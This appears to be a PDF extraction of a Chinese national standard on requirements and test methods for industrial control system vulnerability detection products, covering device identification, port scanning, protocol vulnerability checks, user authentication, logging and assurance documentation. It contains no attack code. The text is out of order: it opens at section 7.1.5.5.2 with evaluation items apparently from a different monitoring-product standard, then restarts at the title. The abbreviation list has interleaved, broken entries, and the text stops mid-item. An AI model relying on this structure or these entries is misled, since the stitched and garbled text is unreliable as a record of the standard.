在控制台进行工业控制漏洞知识库和工业控制检测特征库统一升级。 b) 预期结果: 1) 可以手动或自动升级工业控制漏洞知识库和工业控制检测特征库。 2) 升级过程中被测设备可以正常工作。 3) 可以将升级后的工业控制漏洞知识库和工业控制检测特征库下发给所有被测设备。 7.1.5.5.2 产品升级 产品升级功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 检查产品的升级方式; 2) 启动产品升级功能,进行产品升级。 b) 预期结果: 1) 可以手动或自动升级产品; 2) 升级的过程中被测设备可以正常工作; 3) 升级后被测设备可以正常工作。 7.1.5.5.3 产品统一升级 产品统一升级功能的测试评价方法与预期结果如下: a) 测试评价方法: 在控制台进行产品统一升级。 b) 预期结果: 1) 可以统一对所有被测设备进行产品升级; 2) 升级的过程中被测设备可以正常工作; 3) 升级后被测设备可以正常工作。 7.1.5.5.4 升级包校验 升级包校验功能的测试评价方法与预期结果如下: a) 测试评价方法: 检查产品是否具有升级包校验机制。 b) 预期结果: 产品具有升级包校验机制。 7.1.5.6 用户管理 7.1.5.6.1 标识管理 标识管理功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 检查产品是否支持权限划分; 2) 检查产品是否为每一使用者设置安全属性信息,包括标识、鉴别数据、授权信息或管理组 信息、其他安全属性等。 b) 预期结果: 1) 被测产品支持权限用户划分; 2) 被测产品能够为每一使用者设置安全属性信息,该安全属性信息包括标识、鉴别数据、授 权信息或管理组信息、其他安全属性等,这些属性信息只有具有一定权限的用户才能 修改。 7.1.5.6.2 超时设置 超时设置功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 检查产品是否具有管理员登录超时重新鉴别功能; 2) 设定管理员登录超时重新鉴别的时间间隔; 3) 检查管理员在设定的时间间隔内没有任何操作时产品是否锁定或终止了会话,检查管理 员是否需要再次进行身份鉴别。 b) 预期结果: 1) 产品具有登录超时后重新鉴别功能; 2) 在设定的时间间隔内管理员没有任何操作,会话被锁定或终止,管理员需要再次进行身份 鉴别才可以使用产品; 3) 最大超时时间仅由授权管理员设定。 7.1.5.6.3 控制台鉴别 控制台鉴别功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 设置允许访问被测设备的操作台信息(例如,IP 地址); 2) 从正确的操作台访问被测设备; 3) 从其他操作台访问被测设备。 b) 预期结果: 1) 可以从正确的操作台访问被测设备; 2) 无法从其他操作台访问被测设备。 7.1.5.6.4 会话锁定 会话锁定功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 检查是否允许管理员锁定当前会话; 2) 检查会话锁定后是否需要再次进行身份鉴别才能够重新管理产品。 b) 预期结果: 1) 管理员可以锁定当前会话; 2) 锁定后,管理员需要再次进行身份鉴别才能够重新管理产品。 7.1.5.6.5 鉴别数据保护 鉴别数据保护功能的测试评价方法与预期结果如下: a) 测试评价方法: 检查产品是否仅允许指定的角色查阅或修改身份鉴别数据。 b) 预期结果: 产品应仅允许指定的角色查阅或修改身份鉴别数据。 7.1.6 通信安全 7.1.6.1 通信保密性 通信保密性功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 被测设备提供商,应提供对产品组件之间的数据传输进行加密的检测接口; 2) 判断加解密算法是否符合国家密码相关政策法规; 3) 检查接收端是否可以正常接收并解密。 b) 预期结果: 产品应使用合规的密码算法,在各组件之间传输数据时,数据应能够被正常传输和加解密。 7.1.6.2 通信完整性 通信完整性功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 对产品组件之间的数据传输加以完整性保护; 2) 检查接收端是否可以进行完整性验证。 b) 预期结果: 产品在各组件之间传输数据时,数据应能够被加以完整性保护。 7.1.7 用户管理与鉴别 7.1.7.1 用户管理 用户管理功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 检查产品是否具有用户管理功能; 2) 检查产品是否能够为用户设置安全属性。 b) 预期结果: 1) 产品能够添加、删除、激活、禁止用户; 2) 产品能够设置用户的安全属性。 7.1.7.2 用户鉴别 用户鉴别功能的测试评价方法与预期结果如下: a) 测试评价方法: 登录控制台,检查要求进行身份鉴别。 b) 预期结果: 1) 当用户登录对用户进行鉴别,拒绝未通过鉴别的用户登录; 2) 登录之前允许做的操作,仅限于输入登录信息、查看登录帮助等操作; 3) 允许用户在登录后执行与其安全功能相关的各类操作时,不再重复鉴别。 7.1.7.3 鉴别失败处理 鉴别失败处理功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 检查产品的安全功能是否可定义用户鉴别尝试的最大允许失败次数; 2) 检查产品的安全功能是否可定义当用户鉴别尝试失败连续达到指定次数后,采取相应的 措施、阻止用户进一步的鉴别请求; 3) 尝试多次失败的用户鉴别行为,检查到达指定的鉴别失败次数后,产品是否采取了相应的 措施。 b) 预期结果: 1) 产品具备定义用户鉴别尝试的最大允许失败次数的功能; 2) 当用户鉴别尝试失败连续达到指定次数后,产品能够锁定该账号; 3) 最多失败次数仅由授权用户设定。 7.1.7.4 超时设置 超时设置功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 检查产品是否具有用户登录超时重新鉴别功能; 2) 设定用户登录超时重新鉴别的时间段,检查登录用户在设定的时间段内没有任何操作的 情况下,产品是否锁定或终止了会话,用户是否需要再次进行身份鉴别才能够重新管理和 使用产品。 b) 预期结果: 1) 产品具有登录超时重新鉴别功能; 2) 任何登录用户在设定的时间段内没有任何操作的情况下,应被锁定或终止了会话,管理员 需要再次进行身份鉴别才能够重新管理和使用产品; 3) 最大超时时间仅由授权管理员设定。 7.1.7.5 远程管理 远程管理功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 通过控制台设置可以进行远程管理的主机地址; 2) 检查是否在执行所有功能之前要求首先进行主机地址的身份鉴别; 3) 检查传输过程是否采用了保密性和完整性保护手段。 b) 预期结果: 1) 可以设置远程管理主机地址; 2) 在通过远程主机进行任何与安全功能相关的操作之前都应进行鉴别,拒绝未通过鉴别的 管理请求; 3) 传输过程采用了保密性和完整性保护手段。 7.1.8 产品升级 7.1.8.1 升级功能 升级功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 检查监测产品的升级方式; 2) 进行产品升级。 b) 预期结果: 1) 可以对产品进行升级; 2) 产品在升级的过程中可以正常工作; 3) 产品在升级后可以正常工作。 7.1.8.2 升级包校验 升级包校验功能的测试评价方法与预期结果如下: a) 测试评价方法: 使用经过破坏性修改的升级包进行升级。 b) 预期结果: 产品无法升级并显示将完整性校验结果。 7.1.9 日志管理 7.1.9.1 安全日志生成 安全日志生成功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 结合开发者文档,使用不同角色模拟对产品进行访问、运行、修改、关闭以及重复失败尝试 等相关操作,检查产品提供了对哪些事件的审计; 2) 审查安全日志的正确性。 b) 预期结果: 1) 产品至少为下述可审计事件产生安全日志:用户登录、用户退出、鉴别失败、设备重启、安 全配置更改等重大事件,产品升级时间和版本号等; 2) 在每条安全日志中至少记录如下信息:事件发生的日期、时间、用户标识、事件类型、事件 描述和结果、远程登录的管理主机的地址。 7.1.9.2 安全日志管理 安全日志管理功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 模拟授权与非授权管理员访问安全日志,检查是否仅允许授权管理员访问安全日志; 2) 检查是否可以进行日志查询; 3) 检查是否可以修改日志; 4) 检查日志是否能够导出。 b) 预期结果: 1) 除了具有明确的访问权限的授权管理员之外,禁止所有其他用户对安全日志的访问; 2) 提供日志查询功能; 3) 允许授权管理员保存或删除安全日志; 4) 日志能够以通用格式导出。 7.1.10 策略安全管理 策略安全管理功能的测试评价方法与预期结果如下: a) 测试评价方法: 检查产品具有监控策略,并对监控策略进行创建、修改、删除、应用等操作,检查产品是否对上 述操作提供访问控制功能; b) 预期结果: 产品具有对监控策略进行访问控制的功能。 7.1.11 时钟同步 对于由多个组件的产品,时钟同步功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 评价者应检查产品说明手册,产品是否提供同步时间的功能; 2) 检查监测产品,是否时间同步并有自动记录。 b) 预期结果: 1) 产品提供各组件与中心监测组件的时间同步的功能; 2) 产品提供与外部时间同步的功能。 7.1.12 敏感信息保护 敏感信息保护功能的测试评价方法与预期结果如下: a) 测试评价方法: 1) 评价者应检查产品说明手册,产品是否采取措施对敏感信息进行保护; 2) 检查监测数据的读取是否需要不同用户权限。 b) 预期结果: 1) 产品标识鉴别等手段对敏感信息数据进行保护; 2) 产品只允许用户访问与其自身权限相当的敏感信息。 7.2 安全保障测评方法 7.2.1 配置管理 7.2.1.1 配置管理能力 7.2.1.1.1 版本号 版本号的测试评价方法与预期结果如下: a) 测试评价方法: 评价者应审查开发者提供的配置管理支持文件是否包含以下内容:版本号,要求开发者所使用 的版本号与所应表示的产品样本完全对应,没有歧义。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求,开发者应提供唯一版本号。 7.2.1.1.2 配置项 配置项的测试评价方法与预期结果如下: a) 测试评价方法: 评价者应审查开发者所提供的信息是否满足如下要求: 1) 配置管理功能应对所有的配置项定义唯一的标识。 2) 配置管理文档应包括配置清单、配置管理计划。配置清单用来描述组成系统的配置项。 3) 配置管理文档还应描述对配置项给出唯一标识的方法。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求,评价者审查内容至少包括测试评价方法中的 3方面。 7.2.1.1.3 授权控制 授权控制的测试评价方法与预期结果如下: a) 测试评价方法: 评价者应审查开发者所提供的信息是否满足如下要求: 1) 配置管理系统应保证只有经过授权才能修改配置项。 2) 在配置管理计划中,应描述配置管理系统是如何使用的。实施的配置管理应与配置管理 计划相一致。 3) 配置管理文档还应提供所有的配置项得到有效地维护的证据。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求,评价者审查内容至少包括测试评价方法中的 3 方面。开发者提供的配置管理内容应完整。 7.2.1.2 配置管理覆盖 配置管理覆盖的测试评价方法与预期结果如下: a) 测试评价方法: 评价者应审查开发者提供的配置管理支持文件是否包含以下内容: 1) 产品配置管理范围,要求将系统的交付与运行文档、开发文档、指导性文档、生命周期支持 文档、测试文档、脆弱性分析文档和配置管理文档等置于配置管理之下,从而确保它们的 修改是在一个正确授权的可控方式下进行的。为此要求: ——开发者所提供的配置管理文档应展示配置管理系统至少能跟踪上述配置管理之下的 内容; ——文档应描述配置管理系统是如何跟踪这些配置项的; ——文档还应提供足够的信息表明达到所有要求。 2) 问题跟踪配置管理范围,除产品配置管理范围描述的内容外,要求特别强调对安全缺陷的 跟踪。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求,评价者应审查产品受控于配置管理。 7.2.2 交付与运行 7.2.2.1 交付程序 交付程序的测试评价方法与预期结果如下: a) 测试评价方法: 评价者应审查开发者是否使用一定的交付程序交付系统,并使用文档描述交付过程,并且评价 者应审查开发者交付的文档是否包含以下内容:在给用户方交付系统的各版本时,为维护安全 所必需的所有程序。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求,开发者应提供完整的文档描述所有交付的过 程(文档和程序交付)。 7.2.2.2 安装、生成和启动程序 安装、生成和启动程序的测试评价方法与预期结果如下: a) 测试评价方法: 评价者应审查开发者是否提供了文档说明系统的安装、生成、启动和使用的过程。用户能够通 过此文档了解安装、生成、启动和使用过程,是否具有对产品的现场调试运行提供详细的说明。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求。 7.2.3 开发 7.2.3.1 描述性高层设计 描述性高层设计的测试评价方法与预期结果如下: a) 测试评价方法: 评价者应审查开发者所提供的信息是否满足如下要求: 1) 是内在一致的; 2) 按子系统描述安全功能的结构; 3) 描述每个安全功能子系统所提供的安全功能性; 4) 标识安全功能所要求的任何基础性的硬件、固件或软件,以及在这些硬件、固件或软件中 实现的支持性保护机制所提供功能的一个表示; 5) 标识安全功能子系统的所有接口; 6) 标识安全功能子系统的哪些接口是外部可见的。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求,评价者审查内容至少包括测试评价方法中的 6个方面。开发者提供的高层设计内容应精确和完整。 7.2.3.2 安全加强的高层设计 安全加强的高层设计的测试评价方法与预期结果如下: a) 测试评价方法: 评价者应审查开发者所提供的安全加强高层设计是否满足如下要求: 1) 描述系统的功能子系统所有接口的用途与使用方法,适当时应提供效果、例外情况和错误 消息的细节; 2) 把系统分成安全策略实施和其他子系统来描述。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求,评价者审查内容至少包括测试评价方法中的 2个方面。 7.2.4 指导性文档 7.2.4.1 管理员指南 管理员指南的测试评价方法与预期结果如下: a) 测试评价方法: 评价者应审查开发者是否提供了供授权管理员使用的管理员指南,并且此管理员指南是否包 括如下内容: 1) 产品可以使用的管理功能和接口; 2) 怎样安全地管理产品; 3) 在安全处理环境中应进行控制的功能和权限; 4) 所有对与产品的安全操作有关的用户行为的假设; 5) 所有受管理员控制的安全参数,如果可能,应指明安全值; 6) 每一种与管理功能有关的安全相关事件,包括对安全功能所控制的实体的安全特性进行 的改变; 7) 所有与授权管理员有关的 IT 环境的安全要求。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求,评价者审查内容至少包括测试评价方法中的 7个方面。开发者提供的管理员指南应完整。 7.2.4.2 用户指南 用户指南的测试评价方法与预期结果如下: a) 测试评价方法: 评价者应审查开发者是否提供了供系统用户使用的用户指南,并且此用户指南是否包括如下 内容: 1) 产品的非管理用户可使用的安全功能和接口; 2) 产品提供给用户的安全功能和接口的用法; 3) 用户可获取但应受安全处理环境控制的所有功能和权限; 4) 产品安全操作中用户所应承担的职责; 5) 与用户有关的 IT 环境的所有安全要求。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求,评价者审查内容至少包括测试评价方法中的 5个方面。开发者提供的用户指南应完整。 7.2.5 生命周期支持 生命周期支持的测试评价方法与预期结果如下: a) 测试评价方法: 评价者应审查开发者所提供的开发安全文档是否满足如下要求:描述在系统的开发环境中,为 保护系统设计和实现的保密性和完整性所必需的所有物理的、程序的、人员的和其他方面的安 全措施,并应提供在系统的开发和维护过程中执行安全措施的证据。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求,开发者提供的开发安全文档应完整。 7.2.6 测试 7.2.6.1 测试覆盖 7.2.6.1.1 覆盖证据 覆盖证据的测试评价方法与预期结果如下: a) 测试评价方法: 评价者应审查开发者提供的测试覆盖证据,在测试覆盖证据中,是否表明测试文档中所标识的 测试与功能规范中所描述的系统的安全功能是对应的。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求,开发者提供的测试覆盖证据,应表明测试文档 中所标识的测试与功能规范中所描述的系统的安全功能是对应的。 7.2.6.1.2 覆盖分析 覆盖分析的测试评价方法与预期结果如下: a) 测试评价方法: 1) 评价者应审查开发者提供的测试覆盖分析结果,是否表明了测试文档中所标识的测试与 安全功能设计中所描述的安全功能是对应的; 2) 评价测试文档中所标识的测试,是否完整。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求,开发者提供的测试文档中所标识的测试与安 全功能设计中所描述的安全功能应对应,并且标识的测试应覆盖所有安全功能。 7.2.6.2 测试深度 测试深度的测试评价方法与预期结果如下: a) 测试评价方法: 评价开发者提供的测试深度分析,是否说明了测试文档中所标识的对安全功能的测试,足以表 明该安全功能和高层设计是一致的。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求,评价者测试和审查与安全功能相对应的测试, 这些测试应能正确保证测试出的安全功能符合高层设计的要求。 7.2.6.3 功能测试 功能测试的测试评价方法与预期结果如下: a) 测试评价方法: 1) 评价开发者提供的测试文档,是否包括测试计划、测试规程、预期的测试结果和实际测试 结果; 2) 评价测试计划是否标识了要测试的安全功能,是否描述了测试的目标; 3) 评价测试规程是否标识了要执行的测试,是否描述了每个安全功能的测试概况(这些概况 包括对其他测试结果的顺序依赖性); 4) 评价期望的测试结果是否表明测试成功后的预期输出; 5) 评价实际测试结果是否表明每个被测试的安全功能能按照规定进行运作。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求,评价者审查内容至少包括测试评价方法中的 5个方面。开发者提供的内容应完整。 7.2.6.4 独立测试 7.2.6.4.1 一致性 一致性的测试评价方法与预期结果如下: a) 测试评价方法: 评价者应评价开发者提供的测试系统,提供的测试集合是否与其自测系统功能时使用的测试 集合相一致,提供的执行测试及其结果是否与其自测系统功能时执行的测试及其结果相一致。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求,开发者应提供适合测试的系统,提供的测试集 合应与其自测系统功能时使用的测试集合相一致,提供的执行测试及其结果与其自测系统功 能时执行的测试及其结果相一致。 7.2.6.4.2 抽样 抽样的测试评价方法与预期结果如下: a) 测试评价方法: 评价开发者是否提供一组相当的资源,用于安全功能的抽样测试。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求,开发者应提供一组相当的资源,用于安全功 能的抽样测试。 7.2.7 脆弱性分析保证 7.2.7.1 指南审查 指南审查的测试评价方法与预期结果如下: a) 测试评价方法: 评价者应审查开发者提供的文档,是否满足了以下要求: 1) 评价文档,是否确定了对产品的所有可能的操作方式(包括失败和操作失误后的操作),是 否确定了它们的后果,以及是否确定了对于保持安全操作的意义; 2) 评价文档,是否列出了所有目标环境的假设以及所有外部安全措施(包括外部程序的、物 理的或人员的控制)的要求; 3) 评价文档是否完整、清晰、 一致、合理; 4) 评价开发者提供的分析文档,是否阐明文档是完整的。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求。开发者提供的评价文档应完整,并且通过分 析文档等方式阐明文档是完整的。 7.2.7.2 系统安全功能强度评估 系统安全功能强度评估的测试评价方法与预期结果如下: a) 测试评价方法:评价者应审查开发者提供的指导性文档,是否对所标识的每个具有安全功能强度声明的安全 机制进行了安全功能强度分析,是否说明了安全机制达到或超过定义的最低强度级别或特定 功能强度度量。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求。开发者应对指导性文档中所标识的每个具有 安全功能强度声明的安全机制进行安全功能强度分析,并说明安全机制达到或超过定义的最 低强度级别或特定功能强度度量。 7.2.7.3 开发者脆弱性分析 开发者脆弱性分析的测试评价方法与预期结果如下: a) 测试评价方法: 1) 评价开发者提供的脆弱性分析文档,是否从用户可能破坏安全策略的明显途径出发,对系 统的各种功能进行了分析; 2) 对被确定的脆弱性,评价开发者是否明确记录了采取的措施; 3) 对每一条脆弱性,评价是否能够显示在使用系统的环境中该脆弱性不能被利用; 4) 对每一条脆弱性,评价其是否可能对真实工业控制系统的稳定运行造成影响,确保工业控 制系统的稳定运行。 b) 预期结果: 审查记录以及最后结果符合测试评价方法要求。开发者提供的脆弱性分析文档应完整。
standards
信息安全技术 工业控制系统漏洞检测产品技术要求及 测试评价方法 Information security technology— Technique requirements and testing and evaluation approaches for industrial control system vulnerability detection products 信息安全技术 工业控制系统漏洞检测产品技术要求及 测试评价方法 1 范围 本标准规定了针对工业控制系统的漏洞检测产品的技术要求,包括安全功能要求、自身安全要求和 安全保障要求,以及相应的测试评价方法。 本标准适用于工业控制系统漏洞检测产品的设计、开发和测评。 2 规范性引用文件 下列文件对于本文件的应用是必不可少的。凡是注日期的引用文件,仅注日期的版本适用于本文 件。凡是不注日期的引用文件,其最新版本(包括所有的修改单)适用于本文件。 GB/T 25069—2010 信息安全技术 术语 3 术语和定义 GB/T 25069—2010 界定的以及下列术语和定义适用于本文件。 3.1 漏洞 vulnerability 资产中能被威胁所利用的弱点。 3.2 测试用例 test case 为某个特定目标而编制的一组输入、执行条件以及预期结果,以核实是否满足某个特定需求。 3.3 测试集合 test set 测试用例的组合。 3.4 工业控制组态软件 industrial control configuration software 在控制系统监控层的软件平台和开发环境,使用灵活的方式为用户提供快速配置现场系统状态的 软件工具。 4 缩略语 下列缩略语适用于本文件。 DNP: 分布式网络协议(Distributed HTML: 超文本标记语言(Hypertext HTTP: 超文本传输协议(HyperText Network Protocol) Markup Language) Transfer Protocol) FTP: 文件传输协议(File Transfer Protocol) IP: 互联网协议(Internet Protocol) OLE: 对象连接与嵌入(Object Linking and Embedding) OPC: 用于过程控制的 OLE(OLE for Process Control) RTU: 远程控制终端(Remote Terminal Unit) SNMP: 简单网络管理协议(Simple Network Management Protocol) TCP: 传输控制协议(Transmission Control Protocol) UDP: 用户数据报协议(User Datagram Protocol) 5 产品描述 工业控制系统漏洞检测的目的是检查和分析系统的安全脆弱性,发现可能被入侵者利用的漏洞,并 提出防范和补救措施。工业控制系统漏洞检测产品可以用于离线环境、工业控制系统试运行期间或工 业系统维修期间,能够对工业控制系统中的工业控制设备、通信设备、安全保护设备以及工业控制软件 等进行自动检测,发现存在的漏洞。为防止影响正常生产,不应在工业生产现场使用工业控制系统漏洞 检测产品。 工业控制系统漏洞检测产品分为基本级和增强级。工业控制系统漏洞检测产品安全技术要求的分 级及其要求条款见附录 A 。工业控制系统漏洞检测产品测评方法的分级及其测评项见附录 B。 6 安全技术要求 6.1 安全功能要求 6.1.1 工业控制设备识别 漏洞检测产品应能自动识别工业控制设备。 漏洞检测产品应支持手动添加工业控制设备。 6.1.2 工业控制设备端口扫描 漏洞检测产品应能扫描所有 TCP 端口,检查其是否开启。 漏洞检测产品应能扫描所有 UDP 端口,检查其是否开启。 对于已开启的 TCP 、UDP 端口,漏洞检测产品应能判断出与之对应的公开的工业控制通信协议。 6.1.3 工业控制设备通信协议漏洞检测 漏洞检测产品应能检测使用(包括但不限于)以下通信协议的工业控制设备的已知漏洞: a) 工业以太网协议:Modbus/TCP 协议、OPC 协议、DNP3.0 协议、IEC-60870-5-104 协议、IEC- 61850 MMS协议、Siemens S7Comm 协议、PROFINET 协议、IEC-61850 GOOSE 协议、IEC- 61850 SV 协议、EtherNet/IP 协议; b) 互联网协议:HTTP 协议、FTP 协议、TELNET 协议、SNMP 协议; c) 串口协议:Modbus RTU 协议、IEC-60870-5-101 协议; d) 私有协议(包括行业专业协议)。 6.1.4 工业控制组态软件漏洞检测 漏洞检测产品应能检测工业控制组态软件的已知漏洞。 6.1.5 工业控制设备操作系统检测 漏洞检测产品应能检测工业控制设备操作系统的安全问题,检测项目应包括但不限于以下内容: a) 操作系统类型和版本号识别; b) 操作系统登录弱口令检测; c) 操作系统已知安全漏洞检测。 6.1.6 工业控制数据库漏洞检测 漏洞检测产品应能检测工业控制数据库的已知漏洞。 6.1.7 工业控制网络通信设备漏洞检测 漏洞检测产品应能检测工业控制网络通信设备(例如,工业交换机等)的已知漏洞。 6.1.8 检测结果处理要求 漏洞检测产品应能满足以下要求: a) 漏洞检测产品应能实时查看检测进度。 b) 漏洞检测产品应能实时查看测试用例的执行方法和每一方法的结果。 c) 漏洞检测产品应能监测工业控制设备的实时响应。 d) 检测任务应能随时暂停或者终止。 e) 漏洞检测产品应能保存检测结果。 f) 漏洞检测产品应能记录并追溯导致工业控制设备异常的数据报文。 g) 漏洞检测产品应能根据检测结果自动生成检测报告。检测报告应包括但不限于以下内容: 1) 工业控制设备的信息列表,包括设备类型、固件版本、操作系统版本等; 2) 漏洞的名称、漏洞编号、发布日期等; 3) 潜在的漏洞; 4) 被测设备的危险等级评估,明确标出扫描出的漏洞的危险等级。 h) 检测报告应以通用文档格式(例如,WPS 、DOC 、TXT 、RTF 、PDF 、HTML 等)输出。 i) 测试过程异常终止时,漏洞检测产品应能生成已检测部分的报告,并说明测试过程异常终止。 注:被测设备的危险等级取决于扫描脆弱点的最高危险等级。危险等级的定义参见GB/T30279—2013 中4.2。 6.1.9 管理控制功能要求 漏洞检测产品应能满足以下要求: a) 漏洞检测产品应能针对不同的工业控制设备和系统设置相应的检测参数(例如,扫描地址范 围、端口范围、漏洞类型、测试报文、测试次数、测试时间间隔等)。 b) 漏洞检测产品应支持以下测试方式: 1) 依据工业控制通信协议将测试用例进行归类; 2) 支持测试用例随机组合; 3) 支持测试集合随机组合; 4) 支持用户编写测试用例; 5) 根据设备类型向用户推荐某类或某几类测试用例。 c) 漏洞检测产品应内置工业控制设备信息库并允许更新。 d) 漏洞检测产品应内置漏洞库。 e) 漏洞检测产品应能通过产品升级等方式更新漏洞库,添加新发现的安全漏洞。 f) 漏洞检测产品应内置测试用例库,包含测试用例和测试集合,用于检测已知漏洞和发现未知 漏洞。 6.2 自身安全要求 6.2.1 用户管理与鉴别 漏洞检测产品应能满足以下要求: a) 漏洞检测产品应支持用户管理,包括添加、删除、激活、禁止用户; b) 漏洞检测产品应为每个用户设定标识、权限等安全属性; c) 漏洞检测产品应在用户登录时进行鉴别; d) 当用户鉴别尝试失败连续达到指定次数后,漏洞检测产品应阻止用户进一步的鉴别请求; e) 漏洞检测产品应具有登录超时锁定或注销功能; f) 若漏洞检测产品的控制台提供远程管理功能,应能对可远程管理的主机地址进行身份鉴别和 访问控制,并保证传输数据的保密性和完整性。 6.2.2 产品升级 漏洞检测产品应能满足以下要求: a) 漏洞检测产品应具有升级的功能(包括修复自身缺陷等); b) 漏洞检测产品应具有升级包校验机制,防止得到错误的或伪造的升级包。 6.2.3 日志管理 漏洞检测产品应能满足以下要求: a) 漏洞检测产品应对相关安全事件生成安全日志,包括但不限于以下内容: 1) 登录成功和退出、登录失败; 2) 重启; 3) 鉴别连续尝试不成功的次数超出了设定的限值; 4) 增加、删除管理员角色和对管理员角色的属性进行修改的操作; 5) 对上述审计事件的备份和删除; 6) 升级; 7) 检测操作。 b) 每一条安全日志应包括事件发生的日期、时间、用户标识、事件类型、事件描述和结果。若采用 远程登录方式对漏洞检测产品进行管理还应记录管理主机的地址。 c) 漏洞检测产品应提供下列安全日志管理功能: 1) 只允许授权管理员访问安全日志; 2) 提供对安全日志的查询功能; 3) 授权管理员应能保存或删除安全日志; 4) 安全日志应能够以通用格式(例如,Excel) 导出。 6.2.4 安全存储 漏洞检测产品应能满足以下要求: a) 漏洞检测产品应只允许用户读取自己创建的测试任务数据; b) 用户删除测试任务时,漏洞检测产品应删除与测试任务相关的数据; c) 漏洞检测产品应允许用户导出或导入测试任务数据。 6.3 安全保障要求 6.3.1 配置管理 6.3.1.1 版本号 开发者应为产品的不同版本提供唯一的标识。 6.3.1.2 配置项 开发者应提供配置管理文档。 配置管理文档应包括一个配置清单,配置清单应唯一标识产品的所有配置项并对配置项进行描述。 6.3.2 交付与运行 6.3.2.1 交付程序 开发者交付产品时应将交付过程文档化。 6.3.2.2 安装、生成和启动程序 开发者应提供文档说明产品的安装、生成和启动的过程。 6.3.3 开发 6.3.3.1 功能规范 开发者应提供一个功能规范,功能规范应满足以下要求: a) 描述产品安全功能及其外部接口; b) 是内在一致的; c) 描述所有外部接口的用途与使用方法; d) 效果、例外情况和错误消息的细节; e) 完备地表示产品安全功能。 6.3.3.2 高层设计 开发者应提供产品安全功能的高层设计,高层设计应满足以下要求: a) 是内在一致的; b) 按子系统描述安全功能的结构; c) 描述每个安全功能子系统所提供的安全功能性; d) 标识安全功能所要求的任何基础性的硬件、固件或软件; e) 标识安全功能子系统的所有接口; f) 标识安全功能子系统的哪些接口是外部可见的。 6.3.4 指导性文档 6.3.4.1 管理员指南 开发者应提供管理员指南,管理员指南应与为评估而提供的其他所有文档保持一致。 管理员指南应说明以下内容: a) 管理员可使用的管理功能和接口; b) 安全地管理产品; c) 在安全处理环境中应被控制的功能和权限; d) 对与产品的安全操作有关的用户行为的假设; e) 受管理员控制的安全参数; f) 与管理功能有关的安全相关事件; g) 与管理员有关的IT 环境安全要求。 6.3.4.2 用户指南 开发者应提供用户指南,用户指南应与为评估而提供的其他所有文档保持一致。 用户指南应说明以下内容: a) 产品的非管理员用户可使用的安全功能和接口; b) 产品提供给用户的安全功能和接口的使用方法; c) 用户可获取但应受安全处理环境所控制的所有功能和权限; d) 产品安全操作中用户所应承担的职责; e) 与用户有关的 IT 环境的所有安全要求。 6.3.5 测试 6.3.5.1 测试覆盖 开发者应提供测试覆盖的证据。 在测试覆盖证据中,应表明测试文档中所标识的测试与功能规范中所描述的产品的安全功能是对 应的。 6.3.5.2 功能测试 开发者应测试安全功能,将结果文档化并提供测试文档。 测试文档应包括以下内容: a) 测试计划,应标识要测试的安全功能,并描述测试的目标; b) 测试过程,应标识要执行的测试,并描述每个安全功能的测试概况; c) 预期的测试结果,应表明测试成功后的预期输出; d) 实际测试结果,应表明每个被测试的安全功能能按照规定进行运作。 7 测评方法 7.1 安全功能测试 7.1.1 工业控制设备识别 对工业控制设备自动识别的测试方法与预期结果如下: a) 测试方法: 在漏洞检测产品上输入 IP 地址,漏洞检测产品向该 IP 地址发送测试报文。 b) 预期结果: 1) 对于有效的 IP 地址,漏洞检测产品能够自动识别工业控制设备、正确显示设备厂商名称 和设备类型,或提示用户手动添加工业控制设备; 2) 对于无效的 IP 地址,漏洞检测产品报错。 7.1.2 工业控制设备端口扫描 对工业控制设备端口扫描的测试方法与预期结果如下: a) 测试方法: 漏洞检测产品向工业控制设备的所有 TCP 端口和 UDP 端口发送测试报文。 b) 预期结果: 1) 漏洞检测产品能够根据工业控制设备的响应报文识别出所有开启的 TCP 端口和 UDP 端口; 2) 对于已知的 TCP 端口、UDP 端口,漏洞检测产品能够显示出与之对应的工业控制通信 协议。 7.1.3 工业控制设备通信协议漏洞检测 7.1.3.1 工业以太网协议漏洞检测 工业以太网协议漏洞检测的测试方法与预期结果如下: a) 测试方法: 1) 漏洞检测产品逐一选取6.1.3 a) 中的工业以太网协议; 2) 漏洞检测产品向工业控制设备发送包含工业以太网协议已知漏洞的测试报文。 b) 预期结果: 1) 漏洞检测产品能够支持6.1.3 a) 中的全部工业以太网协议; 2) 漏洞检测产品能通过工业控制设备的响应来发现工业控制设备是否存在的已知漏洞; 3) 漏洞检测产品能够记录所发现的已知漏洞。 7.1.3.2 互联网协议漏洞检测 用于工业控制的互联网协议漏洞检测的测试方法与预期结果如下: a) 测试方法: 1) 漏洞检测产品逐一选取6.1.3 b) 的互联网协议; 2) 漏洞检测产品向工业控制设备发送包含互联网协议已知漏洞的测试报文。 b) 预期结果: 1) 漏洞检测产品能够支持6.1.3 b) 中的互联网协议; 2) 漏洞检测产品能通过工业控制设备的响应来发现工业控制设备是否存在的已知漏洞; 3) 